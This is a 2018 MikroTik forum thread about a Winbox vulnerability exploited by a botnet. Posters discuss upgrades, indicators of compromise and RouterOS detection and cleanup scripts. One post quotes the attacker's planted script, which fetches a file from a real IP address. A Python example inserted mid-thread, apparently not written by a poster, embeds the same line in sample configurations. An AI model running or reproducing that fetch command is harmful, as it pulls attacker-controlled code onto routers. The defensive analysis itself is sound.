Page 1 of 2

Winbox vulnerability: please upgrade

Posted: Thu Aug 02, 2018 1:34 pm
by normis
It has come to our attention that a rogue botnet is currently using the same vulnerability in the RouterOS Winbox service that was patched in RouterOS v6.42.1 on April 23, 2018.

Since all RouterOS devices offer free upgrades with just two clicks, we urge you to upgrade your devices with the "Check for updates" button, if you haven't done so already.

Steps to be taken:

- Upgrade RouterOS to the latest release
- Change your password after upgrading
- Restore your configuration and inspect it for unknown settings. Delete SOCKS configurations, and any unknown scripts
- Implement a good firewall according to the article here: https://wiki.mikrotik.com/wiki/Manual:S ... our_Router

[UPDATED with specific versions]: Full details on what to do and what is affected: https://blog.mikrotik.com/security/winb ... ility.html

Since the attacker is inserting his script into the targeted routers and changing their configuration, we recommend carefully inspecting the configuration of your device, restoring it from verified backups or export files, and following the generic advice in the above links.

Re: Winbox vulnerability: please upgrade

Posted: Thu Aug 02, 2018 1:41 pm
by Samot
@normis, hey can you get this on the blog? I'd like to see any complainers cut off at the pass that this announcement didn't end up in the right spots.

Re: Winbox vulnerability: please upgrade

Posted: Thu Aug 02, 2018 1:49 pm
by normis
@normis, hey can you get this on the blog? I'd like to see any complainers cut off at the pass that this announcement didn't end up in the right spots.
it's already in the blog, because it is the same vulnerability.

Re: Winbox vulnerability: please upgrade

Posted: Thu Aug 02, 2018 1:51 pm
by Samot
That's what I figured.

Re: Winbox vulnerability: please upgrade

Posted: Thu Aug 02, 2018 3:11 pm
by dada
Hi Normis,

what you wrote above may look to someone as if 6.40.8 (bugfix) is not secure either. I would like you to mention that this bugfix release is secure too (the blog needs correction too, but at least it mentions that 6.40.8 is OK).

Re: Winbox vulnerability: please upgrade

Posted: Thu Aug 02, 2018 4:42 pm
by tippenring
@normis, hey can you get this on the blog? I'd like to see any complainers cut off at the pass that this announcement didn't end up in the right spots.
I'm with @Samot. If it's worth a forum post, it's worth posting a similar update to the blog. As soon as the blog was announced I added it to my important RSS feeds so I get fast notifications.
Maybe not a lot of people are monitoring the blog posts yet, but I think to err on the side of a little extra communication is warranted.

On forum posts if the subject line doesn't interest me, I would never read it.

Re: Winbox vulnerability: please upgrade

Posted: Thu Aug 02, 2018 4:49 pm
by BartoszP
On forum posts if the subject line doesn't interest me, I would never read it.
It is like: I do not like this song as I have never listened to it before and the title bores me. :D

Re: Winbox vulnerability: please upgrade

Posted: Thu Aug 02, 2018 5:26 pm
by acruhl
I got a news article about this today through my Google feed. I immediately realized that this is a problem that was fixed a while ago.

But I agree a short new blog post pointing to the earlier post would reduce confusion. People would be coming here looking for new information.

I hope it's clear to people that ports on public facing networks should be blocked using the firewall... Personally I leave ssh open but that's the only thing and I really hope that doesn't get hacked...

Re: Winbox vulnerability: please upgrade

Posted: Thu Aug 02, 2018 6:40 pm
by tippenring
On forum posts if the subject line doesn't interest me, I would never read it.
It is like: I do not like this song as I have never listened to it before and the title bores me. :D
lol. Nice try, but the analogy is weak. A song can be in the background and doesn't consume any time.

This forum is very busy. I do not have time to read all the posts. I am notified of new/updated forum posts via email. A good subject line will get me to spend the time to read the post.

Incidentally, I *really* wish the forum email notifications included the content of the post.

Re: Winbox vulnerability: please upgrade

Posted: Thu Aug 02, 2018 9:25 pm
by jbird
Hi Normis,

what you wrote above may look to someone as if 6.40.8 (bugfix) is not secure either. I would like you to mention that this bugfix release is secure too (the blog needs correction too, but at least it mentions that 6.40.8 is OK).
So, is 6.40.8 secured against this vulnerability or is it not?

Re: Winbox vulnerability: please upgrade

Posted: Thu Aug 02, 2018 9:31 pm
by abjornson
I'd also really like confirmation on whether the latest bugfix ( 6.40.8 ) release has been patched for this vulnerability.

Re: Winbox vulnerability: please upgrade

Posted: Thu Aug 02, 2018 9:56 pm
by Kindis
According to changelog it is fixed
What's new in 6.40.8 (2018-Apr-23 11:34):

!) winbox - fixed vulnerability that allowed to gain access to an unsecured router;

Re: Winbox vulnerability: please upgrade

Posted: Thu Aug 02, 2018 10:28 pm
by ludvik

Re: Winbox vulnerability: please upgrade

Posted: Fri Aug 03, 2018 12:15 am
by garethiowc
this has caused me a nightmare :lol:

Lesson learnt that's for sure.

i'm so glad the script didn't reset any routers but still it's going to take a few days to sort them all out :shock:

Re: Winbox vulnerability: please upgrade

Posted: Fri Aug 03, 2018 12:58 am
by kobuki
On the first link WinboxExploit.py reveals that the admin password is stored in the clear in the device. It simply requests the userdb and prints stuff found at offset 55. Mind == blown.

Hopefully the userdb (and every bit doing anything with passwords in ROS) gets hashes for passwords from now on, and hopefully a modern one.

Re: Winbox vulnerability: please upgrade

Posted: Fri Aug 03, 2018 3:25 am
by Janevski
Hopefully, by using such zero day, somebody hacks, enters into MikroTik HQ, steals, borrows, forks, acquires by using magnets, liberates the source code and makes GNU/RouterOS, so no such zero day happens ever again. :D

Re: Winbox vulnerability: please upgrade

Posted: Fri Aug 03, 2018 3:47 am
by LeftyTs
Personally I leave ssh open but that's the only thing and I really hope that doesn't get hacked...
Even that could get hacked. It is exposed to annoying dictionary attacks all the time. Nowadays, best practice is to simply work through carefully secured and encrypted VPNs and have nothing else open to the public.

Re: Winbox vulnerability: please upgrade

Posted: Fri Aug 03, 2018 6:59 am
by vecernik87
@Normis: Thank you for the email. I know I was a pain in the a** by repeatedly pointing it out, but I believe it was simply missed. It is a bit of a shame it took so long, but I really appreciate this step in order to help RouterOS users secure their devices.
Please be assured that I never wanted to show any hostility against Mikrotik. All my posts were in pursuit of safety for other users, which will in the end help Mikrotik by improving relationship and trust with customers.

Re: Winbox vulnerability: please upgrade

Posted: Fri Aug 03, 2018 8:54 am
by normis
Hopefully the userdb (and every bit doing anything with passwords in ROS) gets hashes for passwords from now on, and hopefully a modern one.
From "now on"? Really? Like stated repeatedly, this has been fixed a long time ago. This is just a reminder AGAIN to please upgrade, where all these things are fixed.

Re: Winbox vulnerability: please upgrade

Posted: Fri Aug 03, 2018 9:11 am
by BartoszP
Normis ...
It seems to be a fight with windmills ... this is an era when most people read JUST THE TOPIC and do not read more than one sentence of the news, and most of them do not even want to think about what they are reading. The topic is all the information they want to know.

Re: Winbox vulnerability: please upgrade

Posted: Fri Aug 03, 2018 9:21 am
by SilverNodashi
According to changelog it is fixed
What's new in 6.40.8 (2018-Apr-23 11:34):

!) winbox - fixed vulnerability that allowed to gain access to an unsecured router;
So why would they post this again if it was fixed in April?

Re: Winbox vulnerability: please upgrade

Posted: Fri Aug 03, 2018 9:30 am
by BartoszP
To not be blamed that they do nothing !!!!

Have you read carefully all recent posts on forum about this "problem"?

Mikrotik is almost blamed for not upgrading 70k+ routers in Brazil, for people not being informed, and so on ...

PS.

Windmills +1

Re: Winbox vulnerability: please upgrade

Posted: Fri Aug 03, 2018 9:59 am
by msatter
In our country we have a lot of windmills and we don't fight them, we use them. However we have a "Bierkaai" and yes, that has to do with beer... and not weed, despite it arriving in the same city.

De Bierkaai was the quay in Amsterdam where the barrels of beer arrived and the porters worked who loaded and unloaded the heavy barrels with beer.
The residents of this part of Amsterdam were known as invincible fighters, and seeking a fight with them was one you would absolutely lose.


So whenever you come to Amsterdam to smoke illegally produced weed, ask about the "Bierkaai". It was a part of the "Oudezijds Voorburgwal", located near the "Oude Kerk".

I wrote on many occasions that security has improved lately. And this security 'problem' was more than a wakeup call; it will carry a lot of fallout and we are only at the beginning of that. I wrote about what could have/should have been done in the past months to inform and warn owners of Mikrotik devices.

Others and I have written a lot of suggestions in the past in different topics and please do something with those suggestions and make a plan so that this will not happen again.
It might take drastic measures which are not seen before but having these kinds of problems can even kill a company, if trust in that company collapses.

Re: Winbox vulnerability: please upgrade

Posted: Fri Aug 03, 2018 10:21 am
by BartoszP
As the Oude Kerk is about 5 min. walking from Central Station, most people who start and end their visit to Amsterdam there do not cross Damstraat and miss e.g. Rembrandt's Museum. They don't even try to visit or just find any of the windmills the Netherlands is famous for :-)

Re: Winbox vulnerability: please upgrade

Posted: Fri Aug 03, 2018 10:49 am
by CZFan
I received an e-mail this morning from one of our Mikrotik distributors here in South Africa, and note this is not the first one I have received from them regarding a Mikrotik Notice.

So to me, it looks like Mikrotik has done all it could to notify the users, well done Mikrotik, very proud to be a Mikrotik Evangelist
MTNotice.JPG

Re: Winbox vulnerability: please upgrade

Posted: Fri Aug 03, 2018 12:55 pm
by kobuki
Hopefully the userdb (and every bit doing anything with passwords in ROS) gets hashes for passwords from now on, and hopefully a modern one.
From "now on"? Really? Like stated repeatedly, this has been fixed a long time ago. This is just a reminder AGAIN to please upgrade, where all these things are fixed.
Yes, from "now on". Figuratively speaking - a few months is almost nothing when you have hundreds of thousands of devices out in the wild. As others already mentioned, do not expect people to promptly install your 0-day fix (as I reckon, there were some communication glitches along the way, too). I still see neighborhood MT devices on way old versions in DCs around the globe. That aside, your quick reaction and fix is exemplary, so we should thank you for that. But please allow some of us to be a little skeptical after the fact that in 2018 you still stored (past tense) something as sensitive in the device as a password, in clear text. Anyway, hoping for the best and life goes on.

Re: Winbox vulnerability: please upgrade

Posted: Fri Aug 03, 2018 2:06 pm
by BartoszP
...Yes, from "now on". Figuratively speaking - a few months is almost nothing when you have hundreds of thousands of devices out in the wild. As others already mentioned, do not expect people to promptly install your 0-day fix (as I reckon, there were some communication glitches along the way, too). I still see neighborhood MT devices on way old versions in DCs around the globe....
Figuratively asking: Are you saying that Mikrotik has hundreds of thousands devices? No, users are owners of them.

Should Mikrotik call/inform each user/owner and "persuade" them to upgrade? What if the user says NO? What if admins in a DC ignore such info?

I'm not "advocatus diaboli" of Mikrotik but you should apply right measure to the problem.

If a car company makes a mistake in a car it calls people to a service point, but someone ignoring this call will be using the bad car forever.
If a food company needs to collect some "bad" food from the market, in spite of problems in the production process, it is impossible to persuade anyone to return it. All owners could be asked to return it but nothing more.

It all depends on users/owners will !!!

Re: Winbox vulnerability: please upgrade

Posted: Fri Aug 03, 2018 2:13 pm
by vecernik87
So to me, it looks like Mikrotik has done all it could to notify the users, well done Mikrotik, very proud to be a Mikrotik Evangelist
The email was released AFTER the news about botnet. It again happened after negative publicity hit the media, despite the fact I was many times asking to send the email earlier.
It was the same mistake as the previous email, which was sent in March 2018 after the whole world was flooded with news about the "vpnfilter" malware (which was using a March 2017 webserver vulnerability)

I really want Mikrotik to succeed and I promote them around my business as I can, and it would be much easier if emails came as preemptive actions instead of reactions to negative publicity in the news.
I know they don't have to, but imagine how much positive publicity Mikrotik can get, if they proactively warn users after the vulnerability is found and fixed and before it gets massively misused. My personal opinion - it would be like a dream! And cost of mass email is not that high...

I definitely disagree with the idea from this topic about home-calling routers, pushing users to update etc.. That is not necessary and creates more issues than it solves.

Re: Winbox vulnerability: please upgrade

Posted: Fri Aug 03, 2018 2:21 pm
by msatter
AVM (Fritz!box) does it because they are in the SOHO area in which Mikrotik is also more and more active.

You can switch off automatic updates and be warned, and even tell it not to check. TR069 can also be disabled so you are the boss.

AVM sells routers in Germany, Poland, the Netherlands, Belgium, Austria and Italy and many other countries. The premium ISP Xs4all in the Netherlands uses Fritz!boxes as their customer device.

I replaced my Fritz!box because AVM is not anymore what it was in the past. I replaced it by Mikrotik but the Fritz!box is still doing WiFi, DECT, house automation.

I can pick up my phone and press a few buttons to check if there is an update. If an update is waiting to be installed I get a beep and a red light blinking on the DECT phone. I can upgrade by selecting the update and it will update the Fritz!box.

And yes, I have forbidden the Fritz!box to check through the DNS server. No firewall rules needed.

Re: Winbox vulnerability: please upgrade

Posted: Fri Aug 03, 2018 2:41 pm
by kobuki
Figuratively asking: Are you saying that Mikrotik has hundreds of thousands devices? No, users are owners of them.

Should Mikrotik call/inform each user/owner and "persuade" them to upgrade? What if the user says NO? What if admins in a DC ignore such info?

I'm not "advocatus diaboli" of Mikrotik but you should apply right measure to the problem.

If a car company makes a mistake in a car it calls people to a service point, but someone ignoring this call will be using the bad car forever.
If a food company needs to collect some "bad" food from the market, in spite of problems in the production process, it is impossible to persuade anyone to return it. All owners could be asked to return it but nothing more.

It all depends on users/owners will !!!
No arguments against the importance of applying updates in time by owners whatsoever. But you're aware that car makers get sued for dysfunctional parts or functional parts having design mistakes, right? That's because they didn't do everything in their power and ability to prevent problems leading to (fatal) accidents. It's exactly because you can't tell users what to do that you need to do everything you can to prevent disasters such as this. If the passwords had been stored as (strong) hashes, the security hole wouldn't have existed to begin with. Well, being able to get the user db is still a problem, but by far not as serious. The only thing I'm pissed about is the pw storage, which has allegedly been fixed along with the Winbox sechole (and very quickly, at that). And don't get me wrong, I will continue to use and advocate MT devices, they're great, but these small mishaps are the ones that usually ruin the reputation of any thriving company.

Re: Winbox vulnerability: please upgrade

Posted: Fri Aug 03, 2018 2:54 pm
by BartoszP
Once again:
I'm not "advocatus diaboli" of Mikrotik but you should apply right measure to the problem.
OK. There was a problem spotted and repaired ... a lot of programs/devices had, have and will have them ... period.

The problem is/was resolved ... time to apply cure. IF YOU WANT. If not ... stop blaming Mikrotik again and again for the past.

Re: Winbox vulnerability: please upgrade

Posted: Fri Aug 03, 2018 3:53 pm
by CZFan
Once again:
I'm not "advocatus diaboli" of Mikrotik but you should apply right measure to the problem.
OK. There was a problem spotted and repaired ... a lot of programs/devices had, have and will have them ... period.

The problem is/was resolved ... time to apply cure. IF YOU WANT. If not ... stop blaming Mikrotik again and again for the past.

Agree, and to mention it again, security will always be a "Reactive" problem

Re: Winbox vulnerability: please upgrade

Posted: Fri Aug 03, 2018 4:57 pm
by msatter
@CZFan, last you wrote that also but that thread was closed before I could read it.

Security is 95% reacting to an attack; the remaining 5% can cause more damage than the 95%.

I mentioned AVM; not long ago they had a big hole in their VOIP system. It was patched and rolled out within a few weeks to all AVM routers. Mikrotik had months of time.

https://www.cvedetails.com/cve/CVE-2015-7242/

Re: Winbox vulnerability: please upgrade

Posted: Fri Aug 03, 2018 5:54 pm
by excession
Since the attacker is inserting his script into the targeted routers and changing configuration in them, we recommend to carefully inspect the configuration of your device, restore it from verified backups or export files, and follow generic advice in the above links.
What sorts of changes are being made?
Are there particular modifications that might be indicative in a config?
Can we see some examples?
Many thanks.

Re: Winbox vulnerability: please upgrade

Posted: Fri Aug 03, 2018 6:01 pm
by msatter
A start can be found here: viewtopic.php?f=2&t=137375

Also check the blog for more information.

Re: Winbox vulnerability: please upgrade

Posted: Fri Aug 03, 2018 6:03 pm
by kobuki
Since the attacker is inserting his script into the targeted routers and changing configuration in them, we recommend to carefully inspect the configuration of your device, restore it from verified backups or export files, and follow generic advice in the above links.
What sorts of changes are being made?
Are there particular modifications that might be indicative in a config?
Can we see some examples?
Many thanks.
What is potentially of interest:
- change/activation of the socks service
- disabling "drop" rules in the fw (seen myself) or ones added allowing unconditional access (seen reported by others)
- unneeded/bogus/suspicious/deleted fw entries (reported by others)
- added suspicious scripts to system/scripts and associated scheduler entries
- deleted existing scripts (reported by others)

There might be others, too, do a search in the forums. I have regular backups using compact export .rsc files so I was able to do a diff and see all changes which I mentioned above, on a particular device.

Re: Winbox vulnerability: please upgrade

Posted: Fri Aug 03, 2018 7:49 pm
by Tonda
So what about version 6.40.8, is it vulnerable or not? Could somebody from Mikrotik finally confirm it?

Re: Winbox vulnerability: please upgrade

Posted: Fri Aug 03, 2018 8:02 pm
by kobuki
So what about version 6.40.8, is it vulnerable or not? Could somebody from Mikrotik finally confirm it?
Have you read the first post of this thread?

EDIT: hmm, now that you asked, and reading the blog post again, it's really not very apparent which version pertains to which release branch at a single glance. Both bugfix and recent stable releases are listed linearly without additional marking. Although if you've fixed your updates on either of them you should be able to determine it. 6.40.8 is the latest bugfix one, so it should be OK.

Re: Winbox vulnerability: please upgrade

Posted: Fri Aug 03, 2018 8:39 pm
by DummyPLUG
From https://wiki.mikrotik.com/wiki/Manual:IP/Services it says MAC winbox uses 20561/udp, so is it better to block this port too?

Re: Winbox vulnerability: please upgrade

Posted: Fri Aug 03, 2018 9:09 pm
by msatter
The MAC addressing is used inside the network (L2) and sometimes on the first hop to your ISP router/switch. MAC can't be blocked as discussed in other threads.

viewtopic.php?f=21&t=133533&p=656925&hi ... 51#p656925

Re: Winbox vulnerability: please upgrade

Posted: Fri Aug 03, 2018 11:20 pm
by Pea
So what about version 6.40.8, is it vulnerable or not? Could somebody from Mikrotik finally confirm it?
Bugfix release tree
Release 6.40.8 2018-04-24
What's new in 6.40.8 (2018-Apr-23 11:34):
!) winbox - fixed vulnerability that allowed to gain access to an unsecured router;
https://mikrotik.com/download/changelog ... lease-tree

Re: Winbox vulnerability: please upgrade

Posted: Fri Aug 03, 2018 11:31 pm
by Moky
MikroTik is at the top of the news today - but, unfortunately, not in a good connotation. :(
It bothers me the most that they put it in the same basket as the cheap Chinese networking manufacturers and vulnerable IoT stuff.

There is no CVE number related to this vulnerability - why? The people are confused with what is this "new" vulnerability because there is no CVE and there is no identifier that will tell them that this is the same vulnerability.
This is a standard way of doing this stuff - you make a CVE and reference it in your announcements and advisories, as well as change history in RouterOS.

You can't blame all of this on users, there are things that can be fixed also from the MikroTik side.
I work in a big enterprise with a large number of products and vendors, and I follow only security mailing lists and advisories, because of the old saying: "if something works well, don't touch it" (I patch and upgrade only when there is a security vulnerability or a functional issue). Another reason is that I don't have enough time to follow all of the different announcements.

I have a few suggestions:
  • For every vulnerability (even the smallest one) create a CVE number with dates, short description etc.
  • If the vulnerability is critical, create an IPS/IDS (Snort or similar) rules so the people can protect themselves before they can upgrade all of the infrastructure.
  • Create a Security sub-forum where people can ask related questions and get advice (I've seen a lot of MikroTik Wireless and Routing gurus that don't have enough security awareness).
  • Create Security mailing list (the Blog you created is a nice step forward, but this is useful for "post event summary" and maybe not exactly for urgent security advisories).
  • Publish some security bug-bounty program and rewards - this way the chances are bigger that the security vulnerabilities will be reported to you and not sold on the DarkWeb or used by bad guys.


I really like MikroTik products and community - it really hurts when things like this happen (not to mention mocking that I get from our Cisco guys).

Kind regards,
Moky

Re: Winbox vulnerability: please upgrade

Posted: Sat Aug 04, 2018 3:48 am
by gotsprings
I made this to look for the common stuff. (Copy and paste into terminal.)

:if ([/ip socks get port] = 1080) do={:log info "Socks port is still Default."} else={:log info "Socks Port changed Possible infection!"}
:if ([/ip socks get enabled] = false) do={:log info "Socks is not on."} else={:log info "Socks is enabled... that could be bad!"}
:if ([:len [/file find name="mikrotik.php"]] > 0) do={:log info "!!!mikrotik.php!!! File Detected!"} else={:log info "mikrotik.php not found."}
:if ([:len [/file find name="Mikrotik.php"]] > 0) do={:log info "!!!Mikrotik.php!!! File Detected!"} else={:log info "Mikrotik.php not found."}
:if ([:len [/user find name="service"]] > 0) do={:log info "!!!YOU WERE BREACHED!!!"} else={:log info "No sign of the service user."}

Open your log and look at the results. If you have a result with "!" you might have a problem.
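kobuki's list of indicators above (socks enabled or re-pointed, disabled drop rules, added scripts and scheduler entries, an added user) and gotsprings' terminal checks both boil down to "compare what is on the router with what should be there". kobuki mentions doing exactly that by diffing compact .rsc exports against regular backups. The following is an added example, written for this thread and not code from MikroTik or from any poster, that does that offline in Python: it parses two export files, set-diffs them, and flags the indicators named in the thread. The two exports are constructed samples; the fetch target 95.154.216.163:2008 and the file name mikrotik.php are the values reported by dsich and volkeu, while the rule comments, script/scheduler names and the socks port 4145 are made up.

```python
import re
from collections import defaultdict

# Constructed sample exports, not real captures. The fetch target 95.154.216.163:2008
# and the file mikrotik.php are the indicators reported in this thread; the rule
# comments, the socks port and the script/scheduler names are made up.
BASELINE_EXPORT = r"""# aug/01/2018 12:00:00 by RouterOS 6.40.8
/ip firewall filter
add action=accept chain=input comment="allow established" connection-state=established,related
add action=accept chain=input comment="allow from LAN" in-interface=bridge
add action=drop chain=input comment="drop everything else"
/ip socks
set enabled=no port=1080
/user
add group=full name=admin
"""
INFECTED_EXPORT = r"""# aug/03/2018 12:00:00 by RouterOS 6.40.8
/ip firewall filter
add action=accept chain=input comment="allow established" connection-state=established,related
add action=accept chain=input comment="allow from LAN" in-interface=bridge
add action=accept chain=input dst-port=8291 protocol=tcp
add action=drop chain=input comment="drop everything else" disabled=yes
/ip socks
set enabled=yes port=4145
/ip socks access
add action=allow src-address=95.154.216.128/25
/system script
add name=script1 source="/tool fetch address=95.154.216.163 port=2008 \
    src-path=/mikrotik.php mode=http"
/system scheduler
add interval=5s name=schedule1 on-event=script1
/user
add group=full name=admin
add group=full name=service
"""
ARG_RE = re.compile(r'([\w.-]+)=("(?:[^"\\]|\\.)*"|\S+)')  # key=value or key="quoted value"

def parse_export(text):
    """Parse an .rsc export into {section: [(verb, {key: value}), ...]}."""
    lines, buf = [], ""
    for raw in text.splitlines():            # fold "\"-continued lines first
        line = raw.strip()
        if line.endswith("\\"):
            buf += line[:-1].rstrip() + " "
            continue
        lines.append(buf + line)
        buf = ""
    sections, current = defaultdict(list), None
    for line in lines:
        if not line or line.startswith("#"):
            continue
        if line.startswith("/"):             # section header such as "/ip socks"
            current = line
            continue
        verb, _, rest = line.partition(" ")  # "add", "set", ...
        args = {k: (v[1:-1] if v.startswith('"') else v) for k, v in ARG_RE.findall(rest)}
        sections[current].append((verb, args))
    return sections

def find_indicators(sections):
    """Flag the post-compromise changes reported in this thread."""
    findings, bad_scripts = [], set()
    for _, a in sections.get("/ip socks", []):
        if a.get("enabled") == "yes":
            findings.append("socks: proxy service enabled")
        if a.get("port", "1080") != "1080":
            findings.append("socks: port changed to " + a["port"])
    for _, a in sections.get("/ip socks access", []):
        findings.append("socks: access rule for " + a.get("src-address", "?"))
    for _, a in sections.get("/ip firewall filter", []):
        if a.get("action") == "drop" and a.get("disabled") == "yes":
            findings.append("firewall: drop rule disabled (%s)" % a.get("comment", "no comment"))
        if (a.get("chain"), a.get("action"), a.get("dst-port")) == ("input", "accept", "8291"):
            findings.append("firewall: accept rule for winbox port 8291 in input chain")
    for _, a in sections.get("/system script", []):
        if "ikrotik.php" in a.get("source", ""):
            bad_scripts.add(a.get("name", "?"))
            findings.append("script: %s references mikrotik.php" % a.get("name", "?"))
    for _, a in sections.get("/system scheduler", []):
        ev = a.get("on-event", "")
        if ev in bad_scripts or "ikrotik.php" in ev:
            findings.append("scheduler: %s runs suspicious script %s" % (a.get("name", "?"), ev))
    for _, a in sections.get("/user", []):
        if a.get("name") == "service":
            findings.append('user: account "service" present')
    return findings

def diff_exports(baseline_text, current_text):
    """Return (added, removed) canonical lines between a trusted export and the current one."""
    def canon(sections):
        return {"%s %s %s" % (sec, verb, " ".join("%s=%s" % kv for kv in sorted(args.items())))
                for sec, entries in sections.items() for verb, args in entries}
    base, cur = canon(parse_export(baseline_text)), canon(parse_export(current_text))
    return sorted(cur - base), sorted(base - cur)

if __name__ == "__main__":
    added, removed = diff_exports(BASELINE_EXPORT, INFECTED_EXPORT)
    print("added:\n  " + "\n  ".join(added), "\nremoved:\n  " + "\n  ".join(removed))
    print("indicators:\n  " + "\n  ".join(find_indicators(parse_export(INFECTED_EXPORT))))
```

Run against real files, replace the two constants with the contents of a known-good `/export compact` and a fresh one. The diff is the part that generalises: it shows every changed line, including indicators nobody has listed yet, while `find_indicators` only knows the patterns from this thread. Entries such as `/file` contents and the password itself do not appear in an export, so the on-router checks (files, users) still belong alongside this.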

Re: Winbox vulnerability: please upgrade

Posted: Sat Aug 04, 2018 10:13 am
by dsich
I have found one of my customers' routers infected. How can I clean it remotely?
I have changed the socks port to default and disabled it. I have not found another user like admin. The password is changed. But in the files there is mikrotik.php. If I delete this, after 5 seconds it's new.
Firmware now is 6.42.6. It's a hAP lite. Winbox in Services is disabled, only Web over port 80 is active and blocked from outside on my core router.

Thanks

Re: Winbox vulnerability: please upgrade

Posted: Sat Aug 04, 2018 10:30 am
by CZFan
This morning I received a mail directly from Mikrotik re vulnerability
MTNotice.JPG

Re: Winbox vulnerability: please upgrade

Posted: Sat Aug 04, 2018 11:17 am
by JimmyNyholm
I got the same Mail two days ago so perhaps they're having problem with the mail systems ? ;-)

Re: Winbox vulnerability: please upgrade

Posted: Sat Aug 04, 2018 1:33 pm
by gotsprings
I have found one of my customers' routers infected. How can I clean it remotely?
I have changed the socks port to default and disabled it. I have not found another user like admin. The password is changed. But in the files there is mikrotik.php. If I delete this, after 5 seconds it's new.
Firmware now is 6.42.6. It's a hAP lite. Winbox in Services is disabled, only Web over port 80 is active and blocked from outside on my core router.

Thanks
Look in scripts and schedule.

Re: Winbox vulnerability: please upgrade

Posted: Sat Aug 04, 2018 2:48 pm
by dsich
Thats it! THX!

In scripts are
/tool fetch address=95.154.216.163 port=2008 src-path=/mikrotik.php mode=http

Re: Winbox vulnerability: please upgrade

Posted: Sat Aug 04, 2018 3:27 pm
by R1CH
It's disappointing that both the httpd vulnerability and now the winbox vulnerability required mass exploitation before Mikrotik sent an email. Why not send these emails on day 1?

Re: Winbox vulnerability: please upgrade

Posted: Sun Aug 05, 2018 9:00 am
by 43north
@normis we were hit with this on July 22nd. I was on a vulnerable firmware and the only service we had open was winbox but with no filtering and on the default port :(.

I caught it in less than 24 hours because of the log file.

I had a backup config from a few days prior to the attack which I restored and then immediately upgraded to the latest current firmware release and routerboard firmware. Obviously reloading my prior backup undid all the changes that I noticed the bot put into my router (socks, script, scheduler, FW allow rule) etc. Can you confirm also that upgrading to the newest firmware actually cleans the malware?

Since then I have changed the default port, only allowed IP SERVICES on the local network, and set up mangle rules for anything that scans my current winbox port and adds it to a blacklist drop rule.

Re: Winbox vulnerability: please upgrade

Posted: Sun Aug 05, 2018 9:20 am
by BartoszP
43north ... you are using our forum ... you are posting ... why have you not upgraded your router earlier even though you (I suppose) had knowledge of the problem?

Re: Winbox vulnerability: please upgrade

Posted: Sun Aug 05, 2018 9:42 am
by 43north
43north ... you are using our forum ... you are posting ... why have you not upgraded your router earlier even though you (I suppose) had knowledge of the problem?
Honestly I had never read the announcements section of the forum, I do now...... and will from here on out. My ignorance cost me, I know. Never again.

I appreciate any feedback from anyone in reference to my post.

Re: Winbox vulnerability: please upgrade

Posted: Sun Aug 05, 2018 9:59 am
by BartoszP
Honestly I had never read the announcements section of the forum, I do now......
43north ... please do not take it personally :-) but this is the quotation of the month ... maybe even of the year.

Re: Winbox vulnerability: please upgrade

Posted: Sun Aug 05, 2018 10:09 am
by 43north
Honestly I had never read the announcements section of the forum, I do now......
43north ... please do not take it personally :-) but this is quotation of the month ... maybe even of the year.
I don't take it personally at all. It is my fault for not being more in tune. I own it 100%. Super frustrating. I appreciate the Mikrotik staff and what they do for us.

After reading some other posts I believe the steps that I took as I posted in this thread have mitigated any issues from the incident.

Re: Winbox vulnerability: please upgrade

Posted: Sun Aug 05, 2018 10:28 am
by msatter
43north ... you are using our forum ... you are posting ... why have you not upgraded your router earlier even though you (I suppose) had knowledge of the problem?
Honestly I had never read the announcements section of the forum, I do now...... and will from here on out. My ignorance cost me, I know. Never again.

I appreciate any feedback from anyone in reference to my post.

169,999 Routers to go. So yours was not the only router that was taken over, that easily.

I keep an eye on the active topics that show all recent postings. The trouble is that important postings like vulnerability postings drop as fast as the rest.
They are swiftly out of sight and you will miss them if you don't check in, several times a day.

Off quote but on topic, would this vulnerability have had the highest CVE rating of 10?

Re: Winbox vulnerability: please upgrade

Posted: Sun Aug 05, 2018 11:05 am
by BartoszP

Re: Winbox vulnerability: please upgrade

Posted: Sun Aug 05, 2018 1:09 pm
by kobuki
  • ...
  • Create Security mailing list (the Blog you created is a nice step forward, but this is useful for "post event summary" and maybe not exactly for urgent security advisories).
    ...
I think this one would be very useful. I for one am subscribed to multiple ones already, and do pay attention to what's announced there since they always concisely describe the issues and give the CVE number(s) where one can see the in-depth details. MT issues regular product and update emails, this is at least as important if not more. It's not enough to list simple update bullets like usual, the email sent out on the 2nd was by far more effective because of its detailed contents and warnings issued.

Re: Winbox vulnerability: please upgrade

Posted: Sun Aug 05, 2018 1:10 pm
by volkeu
I made this to look for the common stuff. (Copy and paste into terminal.)
...
Open you log and look at the results. If you have a result with "!" you might have a problem.
That's not really usable, is it? Besides, you still need to fix it, and upgrade afterwards.
Methinks, better to check and fix at the same time:
# Firewall auto-fix - dangerous if you had disabled drop rules before infection (can't imagine why, though)
:if ([:len [/ip firewall filter find where action=drop disabled]] > 0) do={:put "Firewall drop rules were disabled"; /ip firewall filter enable [find action=drop]}
:if ([:len [/ip firewall filter find chain=input action=accept dst-port="8291"]] > 0) do={:put "Winbox had default firewall accept rule";/ip firewall filter remove [find chain=input action=accept dst-port="8291"]}
# Use this if you need to check firewall rules manually
:if ([:len [/ip firewall filter find where action=drop disabled]] > 0) do={:put "Disabled firewall drop rules:"; /ip firewall filter print where  action=drop disabled}
# Winbox
:if ([/ip service get winbox disabled] != true) do={:put "Winbox was enabled"; /ip service disable winbox}
# Socks
:if ([/ip socks get port] != 1080) do={:put "Socks Port was not 1080"; /ip socks set port=1080}
:if ([/ip socks get enabled] != false) do={:put "Socks was enabled"; /ip socks set enabled=no}
:if ([:len [/ip socks access find src-address~"95.154.216.128"]] > 0) do={:put "ip socks access had rule for 95.154.216.128"; /ip socks access remove [find src-address~"95.154.216.128"]}
# Script and scheduler
:if ([:len [/system script find source~"ikrotik.php"]] > 0) do={:put "Script containing \"ikrotik.php\" found"; :foreach s in=[/system script find source~"ikrotik.php"] do={/system scheduler remove [find on-event~[/system script get $s name]]}; /system script remove [find source~"ikrotik.php"]}
# File mikrotik.php
:if ([:len [/file find name="mikrotik.php"]] + [:len [/file find name="Mikrotik.php"]] > 0) do={ :put "File [Mm]ikrotik.php was found"; /file remove [find name="mikrotik.php"]; /file remove [find name="Mikrotik.php"];}
# User "service"
:if ([:len [/user find name="service"]] > 0) do={:put "User \"service\" existed"; /user remove [find name="service"]}
I even made a bash script, since I needed to fix several dozen routers.
https://pastebin.com/GAtA2mZa

Re: Winbox vulnerability: please upgrade

Posted: Sun Aug 05, 2018 1:22 pm
by msatter
Of course I know where announcements are located, I am not stupid.

